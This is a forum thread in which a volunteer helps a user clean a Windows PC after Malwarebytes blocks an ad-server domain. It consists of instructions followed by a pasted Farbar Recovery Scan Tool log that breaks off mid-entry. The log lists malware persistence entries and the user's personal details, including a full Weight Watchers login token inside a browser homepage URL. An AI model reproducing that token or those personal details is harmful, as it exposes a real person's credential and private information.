Charliew49 Posted November 10, 2017 ID:1181182 Share Posted November 10, 2017 I keep getting an error message that Malwarebytes is blocking outgoing file -- n65adserv.com. How do I remove the file that is causing this? Link to post Share on other sites More sharing options...
Aura Posted November 10, 2017 ID:1181185 Share Posted November 10, 2017 Hi Charliew49 My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state. As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens As long as I'm assisting you on Malwarebytes Forums, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry! If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off; Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against Malwarebytes Forums's rules In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely goneThis being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread This being said, it's time to clean-up some malware, so let's get started, shall we? Can you boot in Safe Mode, run a scan with Malwarebytes and provide me the log? Malwarebytes - Clean Mode Download and install the free version of MalwarebytesNote: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point Once Malwarebytes is installed, launch it and let it update his database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan Let the scan run, the time required to complete the scan depends of your system and computer specs Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected buttonIf it asks you to restart your computer to complete the removal, do so Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply Link to post Share on other sites More sharing options...
Charliew49 Posted November 10, 2017 Author ID:1181256 Share Posted November 10, 2017 Yoan, I have scanned using Malwarebytes and get a message that no threats were found. I am unable to launch and get a screen to take the steps you mentioned. Please advise. Link to post Share on other sites More sharing options...
Aura Posted November 10, 2017 ID:1181257 Share Posted November 10, 2017 Alright, follow the instructions below. Farbar Recovery Scan Tool (FRST) - Scan mode Follow the instructions below to download and execute a scan on your system with FRST, and provide the logs in your next reply. Download the right version of FRST for your system:FRST 32-bit FRST 64-bitNote: Only the right version will run on your system, the other will throw an error message. So if you don't know what your system's version is, simply download both of them, and the one that works is the one you should be using. Move the executable (FRST.exe or FRST64.exe) on your Desktop Right-click on the executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users) Accept the disclaimer by clicking on Yes, and FRST will then do a back-up of your Registry which should take a few seconds Make sure the Addition.txt box is checked Click on the Scan button On completion, two message box will open, saying that the results were saved to FRST.txt and Addition.txt, then open two Notepad files Copy and paste the content of both FRST.txt and Addition.txt in your next reply Link to post Share on other sites More sharing options...
Charliew49 Posted November 10, 2017 Author ID:1181265 Share Posted November 10, 2017 Yoan, that didn't work -- splash screens appeared for a second and then disappeared. I also have AVG installed. There is an option on FRST64.exe shortcut to run it (AVG Icon in the drop down). I clicked on it, AVG screen appeared, it executed FRST64 and returned with no issues within seconds. Link to post Share on other sites More sharing options...
Aura Posted November 10, 2017 ID:1181294 Share Posted November 10, 2017 When I asked you to run a scan with Malwarebytes earlier, were you in Safe Mode? https://www.bleepingcomputer.com/tutorials/how-to-start-windows-in-safe-mode/ Link to post Share on other sites More sharing options...
Charliew49 Posted November 10, 2017 Author ID:1181307 Share Posted November 10, 2017 No. I will do that now. Link to post Share on other sites More sharing options...
Charliew49 Posted November 10, 2017 Author ID:1181346 Share Posted November 10, 2017 Yoan, I got this pop-up error message: Error: _WinAPI_CreateFile Could not open file \\.\PhysicalDrive3 Error: 0 Handle: 0 Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-11-2017 Ran by Charlie (administrator) on CHARLIE-PC (10-11-2017 16:13:49) Running from C:\Users\Charlie\Desktop Loaded Profiles: Charlie (Available Profiles: Charlie) Platform: Windows 10 Pro Version 1703 15063.674 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: FF) Boot Mode: Safe Mode (with Networking) Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\HelpPane.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8512760 2015-08-04] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor) HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [410616 2017-03-13] () HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-30] (Intel Corporation) HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411320 2015-08-04] (Realtek Semiconductor) HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3113592 2015-08-25] (Logitech, Inc.) HKLM\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.) HKLM\...\Run: [AVGUI.exe] => C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe [302744 2017-10-20] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1540896 2015-07-15] (Seagate Technology LLC) HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [239592 2017-10-31] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1284680 2014-01-17] (CANON INC.) HKLM-x32\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 12.5\bin\TrayPopupE\TrayTipAgentE.exe [256144 2017-09-13] () HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2017-09-05] (Oracle Corporation) HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9288408 2016-12-06] (Piriform Ltd) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [QuickenScheduledUpdates] => C:\Program Files (x86)\Quicken\bagent.exe [77216 2017-11-02] (Intuit Inc.) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [127816 2015-07-15] (Seagate Technology LLC) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1421736 2017-03-28] (Garmin Ltd. or its subsidiaries) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AdobeCollabSync.exe [763000 2017-03-28] (Adobe Systems Incorporated) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Svebx<*>] => "C:\Users\Charlie\AppData\Local\Asjam\rursu.vfimyrtu" <==== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Run: [*Qsewipofto<*>] => "C:\Users\Charlie\AppData\Local\Uxuve\l vac.lnk" <==== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\Winlogon: [Shell] - <==== ATTENTION HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\PhotoScreensaver.scr [570880 2017-07-11] (Microsoft Corporation) IFEO\AcroRd32.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\asav.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\dashboard.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\hotspot.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\lastpass.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\lpuninstall.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" IFEO\turbotax.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe" Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk [2016-01-21] ShortcutTarget: Install LastPass FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk [2016-01-21] ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) GroupPolicy: Restriction <==== ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{39b18a1c-5701-477d-9ff3-4fc1ef99d818}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{4fb4f4e8-d31d-4459-aeb2-9f787b0aea73}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e3963092 HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mail.google.com/mail/u/0/#inbox HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com/?pc=DCTE HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://drudgereport.com/ hxxps://www.google.com/?gws_rd=ssl HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKLM -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> DefaultScope {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {07598D8A-E22A-4197-96BD-C92B41887BBB} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e3963092&q={searchTerms} SearchScopes: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000 -> {d4fee3d1-1014-4db8-a824-573bf9ab51c7} URL = BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-11-10] (Microsoft Corporation) BHO: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> No File BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass) BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.) BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation) BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2017-10-22] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll [2017-10-25] (Oracle Corporation) BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass) BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2015-08-25] (Logitech, Inc.) BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\Office16\GROOVEEX.DLL [2017-11-10] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\jp2ssv.dll [2017-10-25] (Oracle Corporation) Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll [2016-01-21] (LastPass) Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll [2016-01-21] (LastPass) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-11-10] (Microsoft Corporation) FireFox: ======== FF DefaultProfile: 9p71s5n4.default-1495840635264 FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 [2017-11-04] FF Homepage: Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278 -> hxxp://www.drudgereport.com/ hxxp://www.washingtontimes.com/ hxxp://www.realclearpolitics.com/index.html hxxp://www.newsmax.com/ hxxp://dailycaller.com/?refresh=true hxxps://mail.google.com/mail/u/0/?shva=1#inbox hxxps://calendar.google.com/calendar/render?tab=mc#g%7Cmonth-3+22844+22881+22857 FF Extension: (No Name) - C:\Users\Charlie\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2017-10-25] [not signed] FF Extension: (LastPass) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\support@lastpass.com [2016-12-17] FF Extension: (ColorfulTabs) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{0545b830-f0aa-4d7e-8820-50a4629a56fe} [2016-12-20] FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-12-16] FF Extension: (YouTube Flash Video Player) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\ar71qvt0.default-1481902172278\Extensions\{f3bd3dd2-2888-44c5-91a2-2caeb33fb898}.xpi [2016-12-28] FF ProfilePath: C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 [2017-11-10] FF NewTab: Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 -> hxxp://search.htrackyourpackages.co?uid=7422a42f-ecf7-4ce3-957d-c2f0fd6040be&uc=20171109&ap=appfocus1&source=g-ccc1-lp0&page=newtab&implementation_id=package_0.2.0 FF Homepage: Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264 -> hxxp://www.drudgereport.com/ hxxps://www.washingtontimes.com/ hxxps://www.realclearpolitics.com/index.html hxxps://cmx.weightwatchers.com/auth#scope=session%20openid&state=http%3A%2F%2Fcmx.weightwatchers.com%2Fnui%2Fmy-day%3Fmode%3Dfood&id_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6IldKZkpkVTlBaDJiS3JzUTE4T2MrOVZFc0s2OD0ifQ.eyJ0b2tlbk5hbWUiOiJpZF90b2tlbiIsImF6cCI6IndlYkNNWCIsInN1YiI6IjJjZTY0YmRmLWI1MTQtNGVjNS04ODFjLTQ4OWZiZmFlMGVmZCIsImxvY2FsZSI6ImVuLVVTIiwiaXNzIjoiaHR0cHM6Ly9hdXRoLndlaWdodHdhdGNoZXJzLmNvbS9vcGVuYW0vb2F1dGgyIiwiaWF0IjoxNTEwMjY3NzQ0LCJNZW1iZXJJRCI6IjQyMjQyOTUxNyIsImF1dGhfdGltZSI6MTUxMDI2Nzc0MiwiZXhwIjoxNTEwMjc0OTQ0LCJ0b2tlblR5cGUiOiJKV1RUb2tlbiIsImF1ZGl0VHJhY2tpbmdJZCI6IjU4NWNkYTEyLWNlNWMtNDRmOC1iZWZmLWU1ZmRlZDcwZmQwNy0yNzMwOTYwMjgiLCJub25jZSI6ImMxOTdmMjI2NzhiOWZkZWY2NDdjNjdlNDg0Yjk5YWZlIiwicmVhbG0iOiIvVVMiLCJhdWQiOiJ3ZWJDTVgiLCJlbnRpdGxlbWVudHMiOlsiY29hY2hpbmctb3JpZW50YXRpb24iLCJjbGFzc2ljLW9ubGluZSJdfQ.MfopEsFTqyIgCcxkK2NQ6dT4Ys3pc5wmRvBkiAvl6zVSu-ovlOyIs8v8Gx-hAio61gvEA8ORCxgfFkvp0E07MFY2z2KLwRusYYtFgqHjtGNK9fKNrPo2xZTJ6Do6gIFeiT8eISlO4FGLg5PUewbdp_0jFHrHtK6XWaZGQXNYv6y_jwbDv38YwzYIzjkSeTVG-683mu3d_UlIoZRVU8sKfFxcN78j7daztpzghV91BKcKSqlq0-dla9LCY8nBkw5K4J44wLMy4ibO0jHrXE9-6cle_tLIAazZS0-DUlCLlE3CqIiE88k4AepU4YwgEqJTBPKENJVWPjOmWz1rVtIeBg FF Extension: (Package) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\@Package.xpi [2017-11-08] FF Extension: (Safe Browsing Version 4 (temporary add-on)) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\sbv4-gradual-rollout@mozilla.com.xpi [2017-11-08] FF Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\support@lastpass.com [2017-10-21] FF Extension: (Adblock Plus) - C:\Users\Charlie\AppData\Roaming\Mozilla\Firefox\Profiles\9p71s5n4.default-1495840635264\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-11-08] FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2016-01-27] [not signed] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_27_0_0_183.dll [2017-10-25] () FF Plugin: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass) FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [No File] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_183.dll [2017-10-25] () FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-09] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-09] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [2017-10-25] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [2017-10-25] (Oracle Corporation) FF Plugin-x32: @lastpass.com/NPLastPass -> C:\Program Files (x86)\LastPass\nplastpass64.dll [2016-01-21] (LastPass) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [No File] FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2017-10-22] (Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-10-22] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Users\Charlie\AppData\Roaming\mozilla\plugins\npatgpc.dll [2014-08-05] (Cisco WebEx LLC) Chrome: ======= CHR DefaultProfile: Default CHR HomePage: Default -> mysearch.avg.com CHR StartupUrls: Default -> "hxxps://accounts.google.com/signin/v2/sl/pwd?service=mail&passive=true&rm=false&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F%3Fshva%3D1&scc=1<mpl=default<mplcache=2&emr=1&osid=1&flowName=GlifWebSignIn&flowEntry=AddSession&cid=0&navigationDirection=forward","hxxps://plus.google.com/discover" CHR DefaultSearchURL: Default -> hxxps://mysearch.avg.com/search?rvt=1&sap=dsp&q={searchTerms} CHR DefaultSearchKeyword: Default -> hxxps://mysearch.avg.com CHR DefaultSuggestURL: Default -> hxxps://toolbar.avg.com/acp?q={searchTerms}&o=1 CHR Profile: C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default [2017-11-09] CHR Extension: (IBM Security Rapport) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbjllphbppobebmjpjcijfbakobcheof [2017-11-08] CHR Extension: (AVG Secure Search) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\chfdnecihphmhljaaejmgoiahnihplgn [2017-09-23] CHR Extension: (Caret) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\fljalecfjciodhpcledpamjachpmelml [2017-10-18] CHR Extension: (Google Docs Offline) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-03-17] CHR Extension: (LastPass: Free Password Manager) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2017-10-21] CHR Extension: (Murder Files) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijfecbiladpinddbjfodaaiahggomhaf [2016-07-03] CHR Extension: (Google Forms) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jhknlonaankphkkbnmjdlpehkinifeeg [2016-07-03] CHR Extension: (Pixlr Touch Up) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jklljiahjgoglchglekebfljnmbaleig [2016-07-03] CHR Extension: (HelloSign: Online signatures made easy) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\kajjckmbclbffbpecfbiecehkfgopppd [2016-07-03] CHR Extension: (WorkFlowy) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\koegeopamaoljbmhnfjbclbocehhgmkm [2017-10-13] CHR Extension: (Solitaire) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkbhppfbabandkdmgjmifahoabeodiep [2017-09-23] CHR Extension: (AVG SafePrice) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbckjcfnjmoiinpgddefodcighgikkgn [2017-10-18] CHR Extension: (Sunrise Calendar) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\mojepfklcankkmikonjlnidiooanmpbb [2016-07-03] CHR Extension: (Chrome Web Store Payments) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-09-10] CHR Extension: (Chrome Media Router) - C:\Users\Charlie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-27] CHR HKLM\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - hxxp://clients2.google.com/service/update2/crx CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx CHR 